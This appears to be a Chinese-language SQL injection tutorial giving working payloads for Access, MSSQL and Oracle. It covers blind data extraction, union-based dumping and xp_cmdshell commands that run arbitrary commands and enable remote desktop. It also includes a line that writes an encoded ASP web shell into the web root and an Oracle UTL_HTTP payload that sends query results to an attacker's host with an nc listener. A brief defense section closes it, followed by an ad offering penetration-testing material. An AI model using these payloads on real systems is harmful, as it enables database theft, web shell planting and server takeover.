標籤:安全性測試 sql注入
1:什麼是SQL注入
SQL注入是一種將SQL代碼插入或添加到應用(使用者)的輸入參數中的攻擊,之後再將這些參數傳遞給背景SQL伺服器加以解析並執行。
www.xx.com/news.php?id=1
www.xx.com/news.php?id=1 and 1=1
這裡我們來理解一下SQL注入
首先,SQL注入常年蟬聯OWASP熱門排行榜第一名~
SQL注入產生的過程是怎樣的呢?見
SQL注入的危害有哪些呢?
資料庫資訊泄露
網頁篡改
網站被掛馬
資料庫被惡意操作
伺服器被遠端控制
破壞硬碟資料。。。。
2 我們來學習一下sql注入的方法
2.1取消友好HTTP錯誤訊息
一般通過遠程測試判斷是否存在SQL注入,所以通常沒有機會通過查看原始碼來複查注入的查詢結構。這導致經常需要通過推理來進行大量測試
開啟IE瀏覽器,選擇菜單“工具”->“Internet選項”對話方塊。
開啟“進階”選項卡,在設定列表中找到“瀏覽”組,
取消勾選”顯示友好HTTP錯誤資訊”複選框 。如
2.2尋找SQL注入
最常用的SQL注入判斷方法,在網站中尋找如下形式的網頁
www.chinaliancheng.com/*.asp?id=1
www.chinaliancheng.com/*.aspx?id=1
www.chinaliancheng.com/*.php?id=1
www.chinaliancheng.com/*.jsp?id=1
單引號法
提交單引號,頁面返回錯誤
and 1=1 and 1=2
提交and 1=1 頁面返回正常 ,提交and 1=2 頁面返回錯誤
2.3確認注入點
區分數字和字串
數字型
SELECT *FROM user WHERE id=1
SELECT * FROM user WHERE id > 1
帶引號類型的
SELECT * FROM user WHERE name = ‘admin’
SELECT * FROM user WHERE date > ‘2017-5-3’
內聯SQL注入:內聯注入是指插入查詢注入SQL代碼後,原來的查詢仍然會全部執行。
終止式SQL注入:終止式SQL語句注入是指攻擊者在注入SQL代碼時,通過注釋剩下的查詢來成功結束該語句。
3:識別資料庫
3.1:資料庫連接運算子
www.xx.com/news.php?uid=admin
www.xx.com/news.php?uid=ad’+’min
www.xx.com/news.php?uid=ad’’min
www.xx.com/news.php?uid=ad||min
3.2 Access資料庫注入
利用內建資料庫表擷取資料庫類型
and (select count(*) from sysobjects)>=0
Sysobjects為Mssql資料庫內建表
and (select count(*) from msysobjects)>=0
Msysobjects為Access資料庫內建表
Access手工注入猜解
猜表名
and exists(select * from 表名)
and(select count(*) from 表名)>=0
猜欄位名
and exists(select 欄位名 from 表名)
and (select count(欄位名) from 表名)>=0
猜欄位長度
and (select top 1 len(欄位名) from 表名)>1
and (select top 1 len(欄位名) from 表名)>2
and (select top 1 len(欄位名) from 表名)>n
猜欄位值
and (select top 1 asc(mid (欄位名,1,1)) from 表名)>0
and (select top 1 asc(mid (欄位名,1,1)) from 表名)>1
and (select top 1 asc(mid (欄位名,1,1)) from 表名)>n
and (select top 1 asc(mid (欄位名,2,1)) from 表名)>0
and (select top 1 asc(mid (欄位名,2,1)) from 表名)>2
and (select top 1 asc(mid (欄位名,2,1)) from 表名)>n
Order by 猜欄位數目
Order by 1
Order by 2
Order by n
Union select 擷取段內容
Union select 1,欄位名,2,…,n from 表名
3.3 Mssql資料庫注入
在進行MsSQL注入攻擊時,首先要對MsSQL注入點進行一下基本的注入檢查,以確定後面的攻擊實施方案。
注入點類型的判斷
and exists (select * from sysobjects)
注入點許可權判斷
and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判斷是否是系統管理員
and 1=(select IS_SRVROLEMEMBER('db_owner')) //判斷是否是庫許可權
and 1=(select IS_SRVROLEMEMBER('public')) //判斷是否為public許可權
返回資訊判斷
and @@version>0 //資料庫資訊
;declare @d int //判斷MsSQL支援多行語句查詢
and (select count(1) from [sysobjects])>=0 //是否支援子查詢
and user>0 //擷取當前資料庫使用者名稱
and 1=convert(int,db_name()) 或 1=(select db_name()) //當前資料庫名
and 1=(select @@servername) //本地服務名
and 1=(select HAS_DBACCESS('master')) //判斷是否有庫讀取許可權
檢查擴充儲存
檢查xp_cmdshell擴充儲存
and 1=(select count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
檢查xp_regread擴充儲存
and 1=(select count(*) FROM master.dbo.sysobjects where name = 'xp_regread')
恢複擴充儲存
刪除xp_cmdshell
exec master..sp_dropextendedproc'xp_cmdshell'
建立xp_cmdshell
exec master..sp_addextendedprocxp_cmdshell,'xplog70.dll‘
該語句利用系統中預設的“xplog70.dll”檔案,自動回復xp_cmdshell。
如果xplog70.dll被刪除或改名,可以自訂路徑進行恢複:
exec master..sp_addextendedproc'xp_cmdshell','c:\xplog70.dll'
Sa許可權下擴充儲存攻擊利用方法
Xp_cmdshell擴充執行任意命令
執行任意命令
;exec master..xp_cmdshell 'dir c:\‘
開啟3389
exec master..xp_cmdshell 'sc config termservice start=auto‘
exec master..xp_cmdshell 'net start termservice'
exec master..xp_cmdshell 'reg add
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v
fDenyTSConnections /t REG_DWORD /d 0x0 /f'
利用sp_makewebtash寫入一句話木馬
exec sp_makewebtask
'c:\inetpub\wwwroot\c.asp','select''%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%
63%68%6F%70%70%65%72%22%29%25%3E'''
Dbowner許可權下的擴充攻擊利用
判斷資料庫使用者權限
and 1=(select is_member('db_owner'));
搜尋Web目錄
建立一個暫存資料表
create table temp(dir nvarchar(255),depth varchar(255),files varchar(255),ID int NOT NULLIDENTITY(1,1));
利用xp_dirtree擴充查詢
insert into temp(dir,depth,files)exec master.dbo.xp_dirtree 'c:',1,1
查詢表中的內容
and(select dir from temp where id=1)>0
查詢暴庫的另一種方法
暴欄位名和欄位值
增加數字n的值,就可以得到表中所有欄位
and (select col_name(object_id(‘表名'),n))=0
擷取欄位內容
and (select top 1 欄位名 from 表名)>0
爆其他欄位值
and (select top 1 欄位名 from 表名 where 欄位名<>欄位值1)>0
3.4 Oracle資料庫注入
Oracle注入點判斷
and 1=1 and 1=2
/*
--
;
and exists(select * from dual)
and exists(select count(*) from user_tables)>0
注入點資訊判斷
確定注入點類型後,與前面的MySQL注入一樣,先用order by 猜出欄位數目,再用聯集查詢union select方法擷取想要的資訊。
擷取資料庫版本資訊
and 1=2 union select null,null,(select banner from sys.v_$version where rownum=1) from dual
擷取當前資料庫連接使用者名稱
and 1=2 union select null,null,(select SYS_CONTEXT ('USERENV','CURRENT_USER') fromdual) from dual
擷取系統平台
and 1=2 union select null,null,(select member from v$logfile where rownum=1) from dual
擷取伺服器SID
and 1=2 union select null,null,(select instance_namefrom v$instance) from dual
爆庫名
and 1=2 union select null,null,(select owner from all_tables where rownum=1) from dual
爆出第一個庫名後可以使用如下語句,繼續爆其他庫名
and 1=2 union select null,null,(select owner from all_table where rownum=1 and owner<>'第一個庫名') from dual
擷取表名
and 1=2 union select null,null,(select table_name from user_tables where rownum=1) from dual
爆其他表名
and 1=2 union select null,null,(select table_name from user_tables where rownum=1 and table_name<>'第一個表名') from dual
注意:表名要用大寫或大寫的十六進位代碼。
擷取欄位名
and 1=2 union select null,null,(select column_name from user_tab_columns where table_name='表名' and rownum=1) from dual
擷取其他欄位名
and 1=2 union select null,null,(select column_name from user_tab_columns where table_name='表名' and column_name<>'第一個欄位' and rownum=1) from dual
擷取欄位內容
and 1=2 union select null,null,欄位名 from 表名
判斷UTL_HTTP預存程序是否可用
and exists(select count(*) from all_objectswhere object_name='UTL_HTTP')
監聽本地連接埠
nc –vv –l –p 8888
UTL_HTTP反彈注入
and UTL_HTTP.request('http://IP:連接埠號碼/'||(查詢語句))=1
4 注入工具介紹
5 防禦sql注入
使用參數化查詢
PHP包含很多用於訪問資料庫的架構。訪問MySQL資料庫的mysqli包,PEAR::MDB2包(它替代了流行的PEAR::DB包)以及新的PHP資料對象(PDO)架構,他們均為使用參數化語句提供便利。
輸入驗證
驗證應用接收到的輸入時一種可用的功能強大的控制手段(如果用的好的話)。
白名單
使用白名單應該開了下列要點:
資料類型:字元、數字等;
資料大小:字串長度是否正確,數位大小和精度是否正確。
資料範圍:如果 是數字型,是否位於該資料類型期望的數字範圍。
資料內容:資料是否屬於期望的資料類型,如手機號碼,它是否瞞住期望的值。
黑名單
黑名單驗證的常用方法也是使用Regex。
編碼輸入與使用預存程序防禦
除了驗證應用受到的輸入以外,通常還需要對在應用的不同模組或部分傳遞的內容進行編碼。
通常會被忽視的情況是對來自資料庫的資訊進行編碼,尤其是當正在使用的資料庫未經過嚴格驗證或審查,或者來自第三方資料來源時。
將應用設計成專門使用預存程序來訪問資料庫是一種可以放置或減輕SQL注入影響的技術。儲存
過程是儲存在資料庫匯總的程式。根據資料庫的不同,可以使用很多不同語言及其變體來編寫預存程序
傳送門--滲透測試_利用Burp爆破使用者名稱與密碼
Google 搜尋引擎文法
提供全套滲透測試資料 1144890271
SQL注入詳解